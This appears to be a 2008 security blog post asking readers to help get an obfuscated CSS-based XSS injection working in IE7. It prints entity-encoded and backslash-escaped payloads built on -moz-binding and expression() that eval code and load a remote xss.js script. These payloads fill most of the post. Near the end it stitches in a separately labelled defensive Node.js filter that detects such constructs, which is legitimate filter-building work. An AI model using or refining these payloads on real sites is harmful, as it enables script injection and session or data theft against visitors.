

XSS
January 20, 2008, 2:43 am
Filed under: security

Your Opinion Counts

OK, I had to do this…

After (2 long) days of testing and re-testing I was forced by circumstances to create this blog dedicated to understanding Ultimate XSS CSS injection, and because I didn't want to make that awesome page a mess with my comments.

So this page is dedicated to those people who can and will help me solve this, especially Gareth Heyes, who takes the credit for all this.

The facts:

We have this XSS injection, "hackvectored" below:

<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs
\/xbl\/xbl\.xml\#xss);&#x78&#x78&#x3A&#x20&#x65&#x5C
&#x78&#x70&#x5C&#x72&#x65&#x5C&#x73&#x5C&#x73&#x5C
&#x69&#x5C&#x6F&#x5C&#x6E&#x28&#x28&#x77&#x69&#x6E
&#x64&#x6F&#x77&#x2E&#x72&#x21&#x3D&#x31&#x29&#x20
&#x3F&#x20&#x65&#x76&#x61&#x6C&#x28&#x27&#x78&#x3D
&#x53&#x74&#x72&#x69&#x6E&#x67&#x2E&#x66&#x72&#x6F
&#x6D&#x43&#x68&#x61&#x72&#x43&#x6F&#x64&#x65&#x3B
&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65
&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45
&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31
&#x31&#x35&#x2C&#x39&#x39&#x2C&#x31&#x31&#x34&#x2C
&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x31&#x31
&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65
&#x74&#x41&#x74&#x74&#x72&#x69&#x62&#x75&#x74&#x65
&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x31&#x31&#x34
&#x2C&#x39&#x39&#x29&#x2C&#x78&#x28&#x31&#x30&#x34
&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x36&#x2C&#x31
&#x31&#x32&#x2C&#x35&#x38&#x2C&#x34&#x37&#x2C&#x34
&#x37&#x2C&#x39&#x38&#x2C&#x31&#x31&#x37&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30
&#x2C&#x31&#x30&#x31&#x2C&#x31&#x31&#x35&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30
&#x2C&#x31&#x30&#x32&#x2C&#x31&#x31&#x31&#x2C&#x34
&#x36&#x2C&#x39&#x39&#x2C&#x31&#x31&#x31&#x2C&#x34
&#x36&#x2C&#x31&#x31&#x37&#x2C&#x31&#x30&#x37&#x2C
&#x34&#x37&#x2C&#x31&#x30&#x38&#x2C&#x39&#x37&#x2C
&#x39&#x38&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C
&#x31&#x32&#x30&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31
&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x31
&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x36&#x2C
&#x31&#x30&#x36&#x2C&#x31&#x31&#x35&#x29&#x29&#x3B
&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x67
&#x65&#x74&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x42
&#x79&#x49&#x64&#x28&#x78&#x28&#x20&#x31&#x30&#x35
&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x36&#x2C&#x31
&#x30&#x31&#x2C&#x39&#x39&#x2C&#x31&#x31&#x36&#x20
&#x29&#x29&#x2E&#x61&#x70&#x70&#x65&#x6E&#x64&#x43
&#x68&#x69&#x6C&#x64&#x28&#x73&#x63&#x72&#x29&#x3B
&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x3D&#x31
&#x3B&#x27&#x29 : 1);" id="inject">test</div>

If we copy and paste this (with the line breaks removed) into the HTML code it works fine in both FF and IE 7.0, BUT what I would love to do is make it work through a CSS file.

This should be an easy task but let’s have a look.

I have a test.html file like the one below (this was done using the link method; it could be done using the @import method, but I'm pretty sure that is not the point):

<html>
<body>

<link rel="stylesheet" type="text/css" href="test.css">
<div id="navigation">– Test –</div>

</body>
</html>

And a CSS file named test.css like the one below (note the line breaks):

div#navigation
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\
.xml\#xss);&#x78&#x78&#x3A&#x20&#x65&#x5C&#x78&#x70&#x5C&#x72&#x6
5&#x5C&#x73&#x5C&#x73&#x5C&#x69&#x5C&#x6F&#x5C&#x6E&#x28&#x28&#x7
7&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x21&#x3D&#x31&#x29&#x20&#x3
F&#x20&#x65&#x76&#x61&#x6C&#x28&#x27&#x78&#x3D&#x53&#x74&#x72&#x6
9&#x6E&#x67&#x2E&#x66&#x72&#x6F&#x6D&#x43&#x68&#x61&#x72&#x43&#x6
F&#x64&#x65&#x3B&#x73&#x63&#x72&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x6
5&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45&#x6C&#x65&#x6
D&#x65&#x6E&#x74&#x28&#x78&#x28&#x31&#x31&#x35&#x2C&#x39&#x39&#x2
C&#x31&#x31&#x34&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x32&#x2C&#x3
1&#x31&#x36&#x29&#x29&#x3B&#x73&#x63&#x72&#x2E&#x73&#x65&#x74&#x4
1&#x74&#x74&#x72&#x69&#x62&#x75&#x74&#x65&#x28&#x78&#x28&#x31&#x3
1&#x35&#x2C&#x31&#x31&#x34&#x2C&#x39&#x39&#x29&#x2C&#x78&#x28&#x3
1&#x30&#x34&#x2C&#x31&#x31&#x36&#x2C&#x31&#x31&#x36&#x2C&#x31&#x3
1&#x32&#x2C&#x35&#x38&#x2C&#x34&#x37&#x2C&#x34&#x37&#x2C&#x39&#x3
8&#x2C&#x31&#x31&#x37&#x2C&#x31&#x31&#x35&#x2C&#x31&#x30&#x35&#x2
C&#x31&#x31&#x30&#x2C&#x31&#x30&#x31&#x2C&#x31&#x31&#x35&#x2C&#x3
1&#x31&#x35&#x2C&#x31&#x30&#x35&#x2C&#x31&#x31&#x30&#x2C&#x31&#x3
0&#x32&#x2C&#x31&#x31&#x31&#x2C&#x34&#x36&#x2C&#x39&#x39&#x2C&#x3
1&#x31&#x31&#x2C&#x34&#x36&#x2C&#x31&#x31&#x37&#x2C&#x31&#x30&#x3
7&#x2C&#x34&#x37&#x2C&#x31&#x30&#x38&#x2C&#x39&#x37&#x2C&#x39&#x3
8&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x30&#x2C&#x3
1&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x37&#x2C&#x31&#x32&#x3
0&#x2C&#x31&#x31&#x35&#x2C&#x31&#x31&#x35&#x2C&#x34&#x36&#x2C&#x3
1&#x30&#x36&#x2C&#x31&#x31&#x35&#x29&#x29&#x3B&#x64&#x6F&#x63&#x7
5&#x6D&#x65&#x6E&#x74&#x2E&#x67&#x65&#x74&#x45&#x6C&#x65&#x6D&#x6
5&#x6E&#x74&#x42&#x79&#x49&#x64&#x28&#x78&#x28&#x20&#x31&#x30&#x3
5&#x2C&#x31&#x31&#x30&#x2C&#x31&#x30&#x36&#x2C&#x31&#x30&#x31&#x2
C&#x39&#x39&#x2C&#x31&#x31&#x36&#x20&#x29&#x29&#x2E&#x61&#x70&#x7
0&#x65&#x6E&#x64&#x43&#x68&#x69&#x6C&#x64&#x28&#x73&#x63&#x72&#x2
9&#x3B&#x77&#x69&#x6E&#x64&#x6F&#x77&#x2E&#x72&#x3D&#x31&#x3B&#x2
7&#x29 : 1);

Now we run a test: FF shows what it was supposed to show, "XBL XSS", which means it works, BUT IE 7.0 does nothing instead of running the JS code at http://businessinfo.co.uk/labs/xss/xss.js, well hidden with <@tocharcodes> and <@hex_ent> using Hackvector.

You can test this using FF or IE7 here.

Of course I've tried many, many different variations of this XSS injection and googled till my eyes blew out, but none of them worked, at least not for IE 7.0. I have to admit I've learned something about CSS, because I was at zero here, but right now I'm just tired of learning and need an answer, so please make my day and give me the answer, and if you do, please make sure the last noob on earth will understand it.

You'll find other variations of the test.css file below:

div#navigation
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;') : 1);
}

OR

div#navigation
{
xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(http://businessinfo.co.uk/labs/xss/xss.js));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;') : 1);
}
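The difference between the inline style attribute and test.css above comes down to which parser decodes which escape layer, and the same fact matters for anyone writing a CSS sanitizer or filter rule. What follows is an added example, not code from the original post, from Hackvector or from the site being tested: a small Node.js normalizer that decodes numeric HTML entities only for the attribute context, decodes CSS backslash escapes in both contexts, and then looks for the constructs the post relies on (expression( and -moz-binding). The sample strings, the example.invalid host and all function names are constructed for this example.

```javascript
// Added example (not from the original post): context-aware normalization of
// CSS text so a sanitizer or filter can recognise obfuscated expression( and
// -moz-binding regardless of the escaping layer used.
//
// Which decoder runs depends on where the CSS lives:
//   * inline style="..." attribute: the HTML parser decodes numeric entities
//     (&#x78 -> 'x') first, then the CSS tokenizer decodes backslash escapes;
//   * external .css file: never touched by the HTML parser, so only CSS
//     backslash escapes (\78, \x, \-) are decoded.

// HTML numeric character references, with or without the trailing semicolon
// (legacy HTML parsing tolerates its absence). Named entities are omitted here.
function decodeHtmlNumericEntities(text) {
  return text.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, num) => {
    const cp = num[0].toLowerCase() === 'x'
      ? parseInt(num.slice(1), 16)
      : parseInt(num, 10);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
  });
}

// CSS backslash escapes (CSS Syntax Module): "\" + 1..6 hex digits, optionally
// followed by one whitespace character, is a code point; "\" + any other
// non-newline character stands for that character itself.
function decodeCssEscapes(text) {
  return text.replace(/\\(?:([0-9a-f]{1,6})[ \t\n]?|([^\n\r]))/gi, (match, hex, ch) => {
    if (hex !== undefined) {
      const cp = parseInt(hex, 16);
      return cp === 0 || cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
    }
    return ch;
  });
}

// Produce the text the CSS parser would see in the given context
// ('attribute' for an inline style attribute, anything else for a stylesheet).
function normalizeCss(text, context) {
  const afterHtml = context === 'attribute' ? decodeHtmlNumericEntities(text) : text;
  return decodeCssEscapes(afterHtml).toLowerCase();
}

// Property names and functions that historically executed script from CSS.
const DANGEROUS = ['expression(', '-moz-binding', 'behavior:', 'javascript:'];

// Returns the dangerous constructs present once escaping is undone and
// whitespace removed (a conservative match for a filter, not a full CSS parser).
function findDangerousConstructs(text, context) {
  const flat = normalizeCss(text, context).replace(/\s+/g, '');
  return DANGEROUS.filter((needle) => flat.includes(needle));
}

// Constructed samples mirroring the two escaping styles in the post
// (hypothetical host example.invalid instead of a real one).
const SAMPLES = {
  // CSS escapes only, as in the test.css variants.
  cssEscaped:
    '\\-\\mo\\z\\-b\\i\\nd\\in\\g:url(//example.invalid/x.xml#xss);' +
    'xx: e\\xp\\re\\s\\s\\i\\o\\n(1)',
  // Numeric entities wrapping "xx: e\xp\re\s\s\i\o\n(1)", as in the hackvectored div.
  entityWrapped:
    '&#x78&#x78&#x3A&#x20&#x65&#x5C&#x78&#x70&#x5C&#x72&#x65&#x5C&#x73' +
    '&#x5C&#x73&#x5C&#x69&#x5C&#x6F&#x5C&#x6E&#x28&#x31&#x29',
};

// Report what each sample looks like to each parser context.
function report() {
  const rows = [];
  for (const [name, text] of Object.entries(SAMPLES)) {
    for (const context of ['attribute', 'stylesheet']) {
      rows.push({ sample: name, context, found: findDangerousConstructs(text, context) });
    }
  }
  return rows;
}

for (const row of report()) {
  console.log(`${row.sample.padEnd(14)} ${row.context.padEnd(10)} -> ${row.found.join(', ') || '(nothing)'}`);
}
```

Run it with node. The entity-wrapped sample reports expression( only in the attribute context: an external stylesheet never passes through the HTML parser, so &#x78 stays the literal seven characters and the property is just an unknown name the CSS parser drops. The same fact cuts the other way for defenders: a filter that greps raw text for expression( misses e\xp\re\s\s\i\o\n, so normalize for the context first and match afterwards.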

I ask for 5 minutes of your time, and I welcome your comments.